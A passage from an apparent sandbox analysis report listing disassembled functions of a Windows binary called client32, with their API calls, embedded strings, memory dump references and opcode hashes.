                                                                                                                                                                • Instruction Fuzzy Hash: 5221F676E4162D9BC701CFA8DC94A9EFBA8BF48755B050125EC08EB340DB34E902DBE0
                                                                                                                                                                Function 110095A0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110D12F0: wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009656
                                                                                                                                                                • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100966B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095D9
                                                                                                                                                                • IsA(), xrefs: 1100960D, 11009635
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009608, 11009630
                                                                                                                                                                • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009665
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 863766397-389219706
                                                                                                                                                                • Opcode ID: 9e9794c30a950b6e2cb783daf9e85ace39663e75e43504d603bff2f617f2da35
                                                                                                                                                                • Instruction ID: e7c1a3c1adf9e1d7e61797cbaf1f46547dfa3f2c2d8ebb091e29c5d978d26bd4
                                                                                                                                                                • Opcode Fuzzy Hash: 9e9794c30a950b6e2cb783daf9e85ace39663e75e43504d603bff2f617f2da35
                                                                                                                                                                • Instruction Fuzzy Hash: 07214C79A40219ABDB00DFD5DD51FEEF3B8FF58618F100259E925B3680EA746904CBA4
                                                                                                                                                                Function 110055F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 1100562D
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 11005638
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100565A
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 1100567F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005613
                                                                                                                                                                • m_hWnd, xrefs: 11005618
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1216912278-2830328467
                                                                                                                                                                • Opcode ID: 0792636c57d639f49c8e83cb971f2d9e9162808fd11bc23f2160297ffd227894
                                                                                                                                                                • Instruction ID: f5aa4065951b5eb8c3932a4188ea608e1f62d63a97b0738e2bbaddb10e89198b
                                                                                                                                                                • Opcode Fuzzy Hash: 0792636c57d639f49c8e83cb971f2d9e9162808fd11bc23f2160297ffd227894
                                                                                                                                                                • Instruction Fuzzy Hash: C1119E75B40218BFE714DBA0CC85FBEB3BCEB88B19F104129F52696180EA71BD04CB64
                                                                                                                                                                Function 110B9000 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32(76967AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                                                                                                • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                                                                                                  • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                                                                                                • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                                                                                                • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                                                                                                • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                                                                                                • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3235510773-0
                                                                                                                                                                • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                                                                                • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                                                                                                • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                                                                                • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                                                                                                Function 1100B270 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                                                                                                                                  • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
                                                                                                                                                                  • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
                                                                                                                                                                  • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
                                                                                                                                                                  • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
                                                                                                                                                                  • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
                                                                                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                                                                                                                                • _free.LIBCMT ref: 1100B2F8
                                                                                                                                                                • _free.LIBCMT ref: 1100B2FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 705253285-0
                                                                                                                                                                • Opcode ID: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                                                                                                • Instruction ID: 1708c8f2d16fe6171f6400e7ced1c046c931d624ac1b1599b235a4591b72ed62
                                                                                                                                                                • Opcode Fuzzy Hash: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                                                                                                • Instruction Fuzzy Hash: 06117075904719ABE711CE70CC88BEFB3ECEB48399F000529FA6656144D774B545CB61
                                                                                                                                                                Function 1101D0F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101D0FE
                                                                                                                                                                • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1101D187
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 430917334-4108050209
                                                                                                                                                                • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                                                                                • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                                                                                                • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                                                                                • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                                                                                                Function 1116B688 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DBF48,00000008,1116B790,00000000,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 1116B699
                                                                                                                                                                • __lock.LIBCMT ref: 1116B6CD
                                                                                                                                                                  • Part of subcall function 1117373C: __mtinitlocknum.LIBCMT ref: 11173752
                                                                                                                                                                  • Part of subcall function 1117373C: __amsg_exit.LIBCMT ref: 1117375E
                                                                                                                                                                  • Part of subcall function 1117373C: EnterCriticalSection.KERNEL32(?,?,?,1116B6D2,0000000D), ref: 11173766
                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EBF10), ref: 1116B6DA
                                                                                                                                                                • __lock.LIBCMT ref: 1116B6EE
                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 1116B70C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                • String ID: KERNEL32.DLL
                                                                                                                                                                • API String ID: 637971194-2576044830
                                                                                                                                                                • Opcode ID: 87162a8c49996136f8a0ae1cfe0992c9c5a4266f29b3674cdc2095790c055c9d
                                                                                                                                                                • Instruction ID: cda3870b418bc819597441e6b87b0a154faa6cd107fe7f3bb1ce7a7edf09897d
                                                                                                                                                                • Opcode Fuzzy Hash: 87162a8c49996136f8a0ae1cfe0992c9c5a4266f29b3674cdc2095790c055c9d
                                                                                                                                                                • Instruction Fuzzy Hash: F5018B79504B069EE3208FB9D84534AFBE4BF54328F10890ED4E6563A0CBB6B650CF15
                                                                                                                                                                Function 11003310 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                                                                                • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                                                                                                • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                                                                                • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                                                                                                Function 11003400 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF1), ref: 1100340D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003433
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003462
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
